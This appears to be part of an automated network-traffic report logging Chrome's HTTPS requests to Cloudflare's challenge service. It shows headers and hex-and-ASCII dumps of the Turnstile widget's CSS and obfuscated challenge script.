                                                                              Data Ascii: ding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiased
                                                                              2024-12-11 14:19:44 UTC1369INData Raw: 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23 30
                                                                              Data Ascii: troke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#0
                                                                              2024-12-11 14:19:44 UTC1369INData Raw: 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72 6b
                                                                              Data Ascii: -dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dark
                                                                              2024-12-11 14:19:44 UTC1369INData Raw: 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65
                                                                              Data Ascii: 0}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-he
                                                                              2024-12-11 14:19:44 UTC1369INData Raw: 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33
                                                                              Data Ascii: stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de13
                                                                              2024-12-11 14:19:44 UTC1369INData Raw: 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70
                                                                              Data Ascii: y:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-comp
                                                                              2024-12-11 14:19:44 UTC1369INData Raw: 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65 78
                                                                              Data Ascii: {left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:flex
                                                                              2024-12-11 14:19:44 UTC1369INData Raw: 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a
                                                                              Data Ascii: lor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width:


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              11192.168.2.1649722104.18.95.414436636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-11 14:19:45 UTC727OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8f061c7f6a0e43aa&lang=auto HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: script
                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/gotfg/0x4AAAAAAAbRCGJdTPdP8Ybc/auto/fbE/normal/auto/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-12-11 14:19:45 UTC331INHTTP/1.1 200 OK
                                                                              Date: Wed, 11 Dec 2024 14:19:45 GMT
                                                                              Content-Type: application/javascript; charset=UTF-8
                                                                              Content-Length: 112567
                                                                              Connection: close
                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Server: cloudflare
                                                                              CF-RAY: 8f061c89ffbd5e82-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-12-11 14:19:45 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 78 45 4a 58 34 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70
                                                                              Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.xEJX4={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.privacy_link":"http
                                                                              2024-12-11 14:19:45 UTC1369INData Raw: 25 32 30 70 61 73 73 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 6f 76 65 72 72 75 6e 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 53 74 75 63 6b 25 32 30 68 65 72 65 25 33 46 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 65 65 64 62 61 63 6b 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 53 65 6e 64 25 32 30 46 65 65 64 62 61 63 6b 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 74 69 6d 65 6f 75 74 22 3a 22 54 69 6d 65 64 25 32 30 6f 75 74 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 61 69 6c 75 72 65 22 3a 22 45 72 72 6f 72 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 6f 6f 74 65 72 5f 70 72 69 76 61 63 79 22 3a 22 50 72 69 76 61 63 79 22 2c 22 63 68 65 63 6b 5f 64 65 6c 61 79 73 22 3a 22 56 65 72 69 66 69 63 61 74 69 6f 6e 25 32 30 69 73 25 32 30 74 61 6b 69 6e 67 25 32 30
                                                                              Data Ascii: %20pass.","turnstile_overrun_description":"Stuck%20here%3F","turnstile_feedback_description":"Send%20Feedback","turnstile_timeout":"Timed%20out","turnstile_failure":"Error","turnstile_footer_privacy":"Privacy","check_delays":"Verification%20is%20taking%20
                                                                              2024-12-11 14:19:45 UTC1369INData Raw: 67 30 2c 67 34 2c 67 35 2c 67 39 2c 67 61 2c 67 67 2c 67 68 2c 67 48 2c 67 65 2c 67 66 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 37 32 30 29 29 2f 31 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 39 34 29 29 2f 32 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 38 31 31 29 29 2f 33 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 39 32 30 29 29 2f 34 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 32 35 29 29 2f 35 2b 70 61 72 73 65 49 6e 74 28 67 49 28 33 36 35 29 29 2f 36 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 33 38 30 29 29 2f 37 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 32
                                                                              Data Ascii: g0,g4,g5,g9,ga,gg,gh,gH,ge,gf){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(720))/1+-parseInt(gI(1194))/2*(parseInt(gI(811))/3)+-parseInt(gI(920))/4+-parseInt(gI(1325))/5+parseInt(gI(365))/6*(parseInt(gI(380))/7)+parseInt(gI(12
                                                                              2024-12-11 14:19:45 UTC1369INData Raw: 27 2b 78 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 33 27 3a 73 3d 28 6f 3d 7b 7d 2c 6f 5b 67 4d 28 38 32 39 29 5d 3d 65 4d 5b 67 4d 28 31 33 39 35 29 5d 5b 67 4d 28 38 32 39 29 5d 2c 6f 5b 67 4d 28 38 32 31 29 5d 3d 65 4d 5b 67 4d 28 31 33 39 35 29 5d 5b 67 4d 28 38 32 31 29 5d 2c 6f 5b 67 4d 28 31 30 32 32 29 5d 3d 65 4d 5b 67 4d 28 31 33 39 35 29 5d 5b 67 4d 28 31 30 32 32 29 5d 2c 6f 5b 67 4d 28 31 34 35 39 29 5d 3d 65 4d 5b 67 4d 28 31 33 39 35 29 5d 5b 67 4d 28 31 34 37 33 29 5d 2c 6f 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 78 3d 66 54 5b 67 4d 28 37 33 32 29 5d 28 6e 29 5b 67 4d 28 31 32 38 39 29 5d 28 27 2b 27 2c 69 5b 67 4d 28 31 30 32 37 29 5d 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 35 27 3a 42 3d 68 7c 7c 67 4d 28
                                                                              Data Ascii: '+x);continue;case'3':s=(o={},o[gM(829)]=eM[gM(1395)][gM(829)],o[gM(821)]=eM[gM(1395)][gM(821)],o[gM(1022)]=eM[gM(1395)][gM(1022)],o[gM(1459)]=eM[gM(1395)][gM(1473)],o);continue;case'4':x=fT[gM(732)](n)[gM(1289)]('+',i[gM(1027)]);continue;case'5':B=h||gM(
                                                                              2024-12-11 14:19:45 UTC1369INData Raw: 5b 32 5d 2c 31 30 29 2c 65 5b 67 4e 28 36 31 31 29 5d 28 70 61 72 73 65 49 6e 74 2c 6c 5b 33 5d 2c 31 30 29 29 7d 7d 65 6c 73 65 20 66 3d 4a 53 4f 4e 5b 67 4e 28 38 31 36 29 5d 28 64 29 3b 72 65 74 75 72 6e 20 6d 3d 7b 7d 2c 6d 5b 67 4e 28 31 34 32 30 29 5d 3d 66 2c 6d 5b 67 4e 28 32 31 39 29 5d 3d 67 2c 6d 5b 67 4e 28 39 33 33 29 5d 3d 68 2c 6d 5b 67 4e 28 31 31 39 35 29 5d 3d 69 2c 6d 5b 67 4e 28 31 31 38 34 29 5d 3d 64 2c 6d 7d 2c 65 4d 5b 67 4a 28 31 34 34 34 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 64 2c 65 2c 66 2c 67 2c 68 2c 67 50 2c 69 2c 6a 2c 6b 2c 6c 29 7b 28 67 50 3d 67 4a 2c 69 3d 64 5b 67 50 28 34 36 31 29 5d 28 29 2c 6a 3d 67 50 28 39 32 32 29 2c 69 5b 67 50 28 31 32 36 39 29 5d 28 6a 29 3e 2d 31 29 3f 65 4d 5b 67 50 28 34 31 30 29 5d 28 66 75
                                                                              Data Ascii: [2],10),e[gN(611)](parseInt,l[3],10))}}else f=JSON[gN(816)](d);return m={},m[gN(1420)]=f,m[gN(219)]=g,m[gN(933)]=h,m[gN(1195)]=i,m[gN(1184)]=d,m},eM[gJ(1444)]=function(d,e,f,g,h,gP,i,j,k,l){(gP=gJ,i=d[gP(461)](),j=gP(922),i[gP(1269)](j)>-1)?eM[gP(410)](fu
                                                                              2024-12-11 14:19:45 UTC1369INData Raw: 66 4f 29 3e 66 29 66 61 28 29 3b 65 6c 73 65 20 69 66 28 65 5b 69 61 28 31 30 39 34 29 5d 28 69 61 28 31 33 31 35 29 2c 65 5b 69 61 28 31 34 30 37 29 5d 29 29 72 65 74 75 72 6e 20 64 3b 65 6c 73 65 20 66 62 28 29 7d 2c 31 65 33 29 29 2c 66 53 3d 7b 7d 2c 66 53 5b 67 4a 28 31 31 33 33 29 5d 3d 21 5b 5d 2c 66 53 5b 67 4a 28 33 30 30 29 5d 3d 65 55 2c 66 53 5b 67 4a 28 31 33 33 39 29 5d 3d 66 47 2c 66 53 5b 67 4a 28 31 32 39 33 29 5d 3d 66 4c 2c 66 53 5b 67 4a 28 39 32 33 29 5d 3d 66 4d 2c 66 53 5b 67 4a 28 31 34 37 37 29 5d 3d 66 48 2c 66 53 5b 67 4a 28 35 36 35 29 5d 3d 66 4e 2c 66 53 5b 67 4a 28 35 39 30 29 5d 3d 66 4b 2c 66 53 5b 67 4a 28 31 35 33 33 29 5d 3d 66 4a 2c 66 53 5b 67 4a 28 37 30 35 29 5d 3d 66 38 2c 66 53 5b 67 4a 28 31 30 32 30 29 5d 3d 66
                                                                              Data Ascii: fO)>f)fa();else if(e[ia(1094)](ia(1315),e[ia(1407)]))return d;else fb()},1e3)),fS={},fS[gJ(1133)]=![],fS[gJ(300)]=eU,fS[gJ(1339)]=fG,fS[gJ(1293)]=fL,fS[gJ(923)]=fM,fS[gJ(1477)]=fH,fS[gJ(565)]=fN,fS[gJ(590)]=fK,fS[gJ(1533)]=fJ,fS[gJ(705)]=f8,fS[gJ(1020)]=f
                                                                              2024-12-11 14:19:45 UTC1369INData Raw: 68 3c 69 7d 2c 27 6b 72 73 6c 57 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 53 74 56 48 57 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 54 76 52 57 4e 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 74 4a 42 4b 42 27 3a 69 63 28 39 30 35 29 2c 27 57 6d 62 49 5a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 42 6a 58 6c 62 27 3a 69 63 28 37 30 31 29 2c 27 65 42 49 42 45 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 21 3d 69 7d 2c 27 76 4a 72 6e 57 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 58 79 72 42 5a 27 3a 66 75
                                                                              Data Ascii: h<i},'krslW':function(h,i){return h(i)},'StVHW':function(h,i){return h-i},'TvRWN':function(h,i){return i==h},'tJBKB':ic(905),'WmbIZ':function(h,i){return h==i},'BjXlb':ic(701),'eBIBE':function(h,i){return h!=i},'vJrnW':function(h,i){return h<i},'XyrBZ':fu
                                                                              2024-12-11 14:19:45 UTC1369INData Raw: 65 63 74 5b 69 6d 28 34 39 32 29 5d 5b 69 6d 28 31 34 36 31 29 5d 5b 69 6d 28 35 31 37 29 5d 28 42 2c 4d 29 29 44 3d 4d 3b 65 6c 73 65 7b 69 66 28 4f 62 6a 65 63 74 5b 69 6d 28 34 39 32 29 5d 5b 69 6d 28 31 34 36 31 29 5d 5b 69 6d 28 35 31 37 29 5d 28 43 2c 44 29 29 7b 69 66 28 64 5b 69 6d 28 31 33 34 32 29 5d 21 3d 3d 64 5b 69 6d 28 31 33 34 32 29 5d 29 50 3d 74 68 69 73 2e 68 5b 74 68 69 73 2e 68 5b 73 5b 69 6d 28 36 37 36 29 5d 28 32 34 32 2c 74 68 69 73 2e 67 29 5d 5b 33 5d 5e 73 5b 69 6d 28 31 34 34 39 29 5d 28 73 5b 69 6d 28 32 33 35 29 5d 28 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 32 34 32 5d 5b 31 5d 5b 69 6d 28 32 35 39 29 5d 28 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 32 34 32 2e 30 39 5d 5b 30 5d 2b 2b 29 2c 31 32 31 29 2b 32 35 36 2c 32 35
                                                                              Data Ascii: ect[im(492)][im(1461)][im(517)](B,M))D=M;else{if(Object[im(492)][im(1461)][im(517)](C,D)){if(d[im(1342)]!==d[im(1342)])P=this.h[this.h[s[im(676)](242,this.g)][3]^s[im(1449)](s[im(235)](this.h[this.g^242][1][im(259)](this.h[this.g^242.09][0]++),121)+256,25
                                                                              2024-12-11 14:19:45 UTC1369INData Raw: 5b 69 6d 28 36 36 34 29 5d 21 3d 3d 64 5b 69 6d 28 35 32 34 29 5d 29 7b 66 6f 72 28 78 3d 30 3b 78 3c 47 3b 49 3c 3c 3d 31 2c 64 5b 69 6d 28 33 31 32 29 5d 28 4a 2c 64 5b 69 6d 28 34 30 39 29 5d 28 6a 2c 31 29 29 3f 28 4a 3d 30 2c 48 5b 69 6d 28 31 33 39 32 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 78 2b 2b 29 3b 66 6f 72 28 4e 3d 44 5b 69 6d 28 32 35 39 29 5d 28 30 29 2c 78 3d 30 3b 38 3e 78 3b 49 3d 64 5b 69 6d 28 32 31 33 29 5d 28 49 3c 3c 31 2e 33 32 2c 31 26 4e 29 2c 4a 3d 3d 64 5b 69 6d 28 31 32 37 34 29 5d 28 6a 2c 31 29 3f 28 4a 3d 30 2c 48 5b 69 6d 28 31 33 39 32 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 7d 65 6c 73 65 20 51 3d 7b 7d 2c 51 5b 69 6d 28 31 32 34 38 29 5d 3d 73 5b 69 6d 28 39
                                                                              Data Ascii: [im(664)]!==d[im(524)]){for(x=0;x<G;I<<=1,d[im(312)](J,d[im(409)](j,1))?(J=0,H[im(1392)](o(I)),I=0):J++,x++);for(N=D[im(259)](0),x=0;8>x;I=d[im(213)](I<<1.32,1&N),J==d[im(1274)](j,1)?(J=0,H[im(1392)](o(I)),I=0):J++,N>>=1,x++);}else Q={},Q[im(1248)]=s[im(9
                                                                              2024-12-11 14:19:45 UTC1369INData Raw: 3d 3d 69 5b 69 71 28 31 34 37 31 29 5d 29 3f 68 5b 69 71 28 32 35 39 29 5d 28 6a 29 3a 28 6c 3d 7b 7d 2c 6c 5b 69 71 28 38 37 31 29 5d 3d 69 71 28 38 36 37 29 2c 6d 3d 6c 2c 69 5b 69 71 28 36 31 38 29 5d 28 6e 75 6c 6c 2c 66 29 3f 27 27 3a 6a 2e 67 28 68 2c 36 2c 66 75 6e 63 74 69 6f 6e 28 6e 2c 69 72 29 7b 72 65 74 75 72 6e 20 69 72 3d 69 71 2c 6d 5b 69 72 28 38 37 31 29 5d 5b 69 72 28 31 37 31 29 5d 28 6e 29 7d 29 29 7d 29 7d 2c 27 69 27 3a 66 75 6e 63 74 69 6f 6e 28 6a 2c 6f 2c 73 2c 69 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 4c 2c 4d 2c 4e 2c 50 2c 4f 29 7b 69 66 28 69 73 3d 69 63 2c 78 3d 7b 7d 2c 78 5b 69 73 28 35 36 36 29 5d 3d 69 73 28 31 34 31 33 29 2c 78 5b 69 73 28 31 31 32 31 29 5d 3d 69 73 28 35 35 32 29 2c 42
                                                                              Data Ascii: ==i[iq(1471)])?h[iq(259)](j):(l={},l[iq(871)]=iq(867),m=l,i[iq(618)](null,f)?'':j.g(h,6,function(n,ir){return ir=iq,m[ir(871)][ir(171)](n)}))})},'i':function(j,o,s,is,x,B,C,D,E,F,G,H,I,J,K,L,M,N,P,O){if(is=ic,x={},x[is(566)]=is(1413),x[is(1121)]=is(552),B


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              12192.168.2.1649723104.18.95.414436636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-11 14:19:45 UTC739OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: image
